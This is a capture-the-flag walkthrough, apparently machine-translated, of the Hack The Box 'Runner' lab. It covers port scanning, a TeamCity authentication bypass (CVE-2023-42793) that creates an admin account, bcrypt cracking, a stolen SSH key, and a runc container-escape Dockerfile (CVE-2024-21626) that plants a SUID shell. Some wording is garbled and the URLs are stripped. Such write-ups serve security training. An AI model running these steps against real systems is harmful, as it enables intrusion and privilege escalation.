HTB-Runner target machine notes
summarize
Runner is a moderately difficult Linux target machine on HTB that contains the followingteamcity
Vulnerability (CVE-2023-42793) This vulnerability allows users to bypass authentication and extract API tokens. As well as docker containers escaping CVE-2024-21626 to perform power lifting operations
Runner target machine address:/machines/Runner
I. nmap scanning
1) Port scanning
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.13
Warning: 10.10.11.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.13
Host is up (0.26s latency).
Not shown: 63375 closed tcp ports (conn-refused), 2157 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
# Nmap done at Fri Aug 30 22:29:18 2024 -- 1 IP address (1 host up) scanned in 47.39 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80,8000 -o detail 10.10.11.13
Starting Nmap 7.93 ( ) at 2024-09-01 20:51 EDT
Nmap scan report for 10.10.11.13
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to /
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds
see thathttp-title: Did not follow redirect to
Let's go to the /etc/hosts file and bind the domain name
sudo vi /etc/hosts
particle marking the following noun as a direct object10.10.11.13
put it in
3) Default Script Scanning
sudo nmap --script=vuln -p22,80,8000 10.10.11.13 -o vuln
II. Web penetration
Opened the homepage to test and collect a circle of information, and there is no useful, may be used is the name of the homepage line surface
shot,
etc. are 404 pages
Try both directory bursting and subdomain bursting.
1) Catalog Blasting
sudo gobuster dir -u -w /usr/share/wordlists/dirb/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> /assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
2) Sub-domain blasting
ffuf -u -H "HOST:" -w /usr/share/SecLists/Discovery/DNS/ -fs 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/DNS/
:: Header : Host:
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 121ms]
* FUZZ: teamcity
Directory on the left, subdomains on the right
3) Information Analysis
Directory blasts clicked through with no useful information, and we swept up a subdomainwrite
/etc/hosts
Papers
echo "10.10.11.13 " | tee -a /etc/hosts
interviews
Tested sql injection, reset password, etc., none of them work, google search vulnerability
CVE-2023-42793 :/exploits/51884
He allows us to create an administrator user without authorization, start reading the exp, his internal principle is not difficult to understand. It is unauthorized access, resulting in the administrator's token leakage, the use of this token to create a new administrator account
Paste his code into kali, empty commands to see help
python
=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================
usage: [-h] -u URL [-v]
: error: the following arguments are required: -u/--url
python -u
=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================
Token: eyJ0eXAiOiAiVENWMiJ9.Z2Q5NHVFQjFpdnJqLVpvRjVueVNkWTF4WkN3.YTM5MjkwZTktNTU1MS00MzA5LThkYTUtODc2MTQ5M2MwODUx
Successfully exploited!
URL:
Username: city_adminbsnn
Password: Main_password!!**
He created an administrator user for uscity_adminbsnn:Main_password!!**
Log in.
Go to the backend and download the backup file
Download it locally and unzip it
Go through the directory, the configuration file and the database file usually have information, first change the permissions
sudo chmod -R 777 *
I found it in my search.users
hash value of
Take the voucher information and use theawk
,sed
,tee
and other tools to deal with it, and of course copying it to a new file red can be
John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u
Identify the encryption method with hashid
cat creds | awk -F: '{print $2}'|head -n 1 | hashid
Analyzing '$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board
[+] bcrypt
bebcrypt
Find the module number in hashcat
hashcat --help| grep bcrypt
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
brute force password cracking
hashcat creds /usr/share/wordlists/ --username -m 3200
Execution completed, view results
hashcat creds /usr/share/wordlists/ --username -m 3200 --show
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/:piper123
a) Account Information
Vouchers:Matthew:piper123
Tried ssh and found it wasn't. Had to give up. Go ahead and look in the backup file to see if there's anything else I can find.
b) ssh information
Finally found the ssh key
./config/projects/AllProjects/pluginData/ssh_keys/id_rsa
Let's copy it.
cp ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa ../../id_rsa
Check out who it belongs to
cat john.id_rsa | grep -v '\-' | base64 -d | strings
Seeing that the plaintext message hasjohn@runner
rename
III. Gaining a foothold
chmod 600 id_rsa
ssh [email protected] -i john.id_rsa -o EnableEscapeCommandline=yes
-o EnableEscapeCommandline=yes
is to allow ssh tunneling commands to be executed back to the physical machine when ssh is connected, making it easier to build sockets tunnels, or establish port forwarding
iv. power of attorney
ss -lant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5005 0.0.0.0:* LISTEN -
tcp 0 248 10.10.11.13:22 10.10.14.11:33776 ESTABLISHED -
tcp 0 0 127.0.0.1:59056 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:41720 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 10.10.11.13:80 10.10.14.11:33912 ESTABLISHED -
tcp 0 0 172.17.0.1:54814 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:59430 TIME_WAIT -
tcp 0 0 127.0.0.1:59216 127.0.0.1:8111 TIME_WAIT -
tcp 0 1 10.10.11.13:38340 8.8.8.8:53 SYN_SENT -
tcp 0 0 172.17.0.1:34338 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 172.17.0.1:40448 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:58786 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:33934 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:55392 TIME_WAIT -
tcp 0 0 172.17.0.1:54802 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:41716 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 10.10.11.13:80 10.10.16.3:34523 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:55406 TIME_WAIT -
tcp 0 0 172.17.0.1:54982 172.17.0.2:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:59044 127.0.0.1:8111 TIME_WAIT -
tcp 0 0 127.0.0.1:8111 127.0.0.1:59436 TIME_WAIT -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8000 :::* LISTEN -
See a bunch of local ports open, build a sockets tunnel for ssh, visit the
In an ssh session, press~C
Entering an ssh session
Hitting enter twice to exit won't terminate our sockets proxy.
Configure the sockets proxy in kali's local browser127.0.0.1:1080
Then you can access the target's resources. I'm using Little Fox here, depending on your personal preference. Build it and you're good to go.
Found that 9000 is a docker admin page.
Login required
Obtained in the secondVouchers:Matthew:piper123
Since it's not ssh credentials, try it here
Successful landing
Now that we have docker, let's see what version of runc we have.
runc --version
runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.3
This one has a container escape vulnerability
CVE-2024-21626:/blog/leaky-vessels-container-escape-vulnerabilities#cve-2024-21626-5
/files/176993/runc-1.1.
Simple to understand:
just like
runc
Improper management in handling file descriptors. File descriptor leaks allow newly created container processes to accidentally inherit working directories in the host file system namespace. This leak allowed container processes to access the host filesystem, leading to container escapes.
By learning and understanding this vulnerability, combined with the current state of our target machine, we are not able to create and manipulate a docker image in this target machine, but we can create and manipulate a docker image in theportainer
Create containers and images in the panel
We'll create the folder with john in the target machine.
mkdir -p /tmp/lingx5
cp /bin/bash /tmp/lingx5/bash
Fill in the
FROM ubuntu:latest
WORKDIR /proc/self/fd/8
RUN cd ../../../../../../../../ && \
chmod -R 777 /tmp/lingx5 && \
chown -R root:root /tmp/lingx5 && \
chmod u+s /tmp/lingx5/bash
Click on the builimage below
Let's just put/tmp/lingx5/bash
The file is given SUID permissions
Seeing that the compilation was successful, it should have given our/tmp/lingx5/bash
SUID privileges are granted
fulfillment
/tmp/lingx5/bash -p
Privilege to root
cat /root/
summarize
- We did a port discovery on the host using nmap and found ports 22,80,8000 open.
- In the process of penetration of 80, found that the home page of the directory blasting information is very little, the idea of sub-domain blasting, blasting the
teamcity
The subdomain found CVE-2023-42793 by searching google for public vulnerabilities and created an admin user. We logged in and found a backup function, we downloaded the backup file locally, and during the rummage we found theCredentials: matthew:piper123
and a ssh key for john - After using the key to gain a foothold on john and looking at the services running locally, most of them are ports that only allow local access, we built a sockets tunnel using ssh and visited the page to find the docker service on port 9000.
- utilization
Credentials: matthew:piper123
Logged into the backend, through the judgment of the runc version, found that there is an escape vulnerability, using the principle of CVE-2024-21626, and some reproduction of the important operation to lift the power.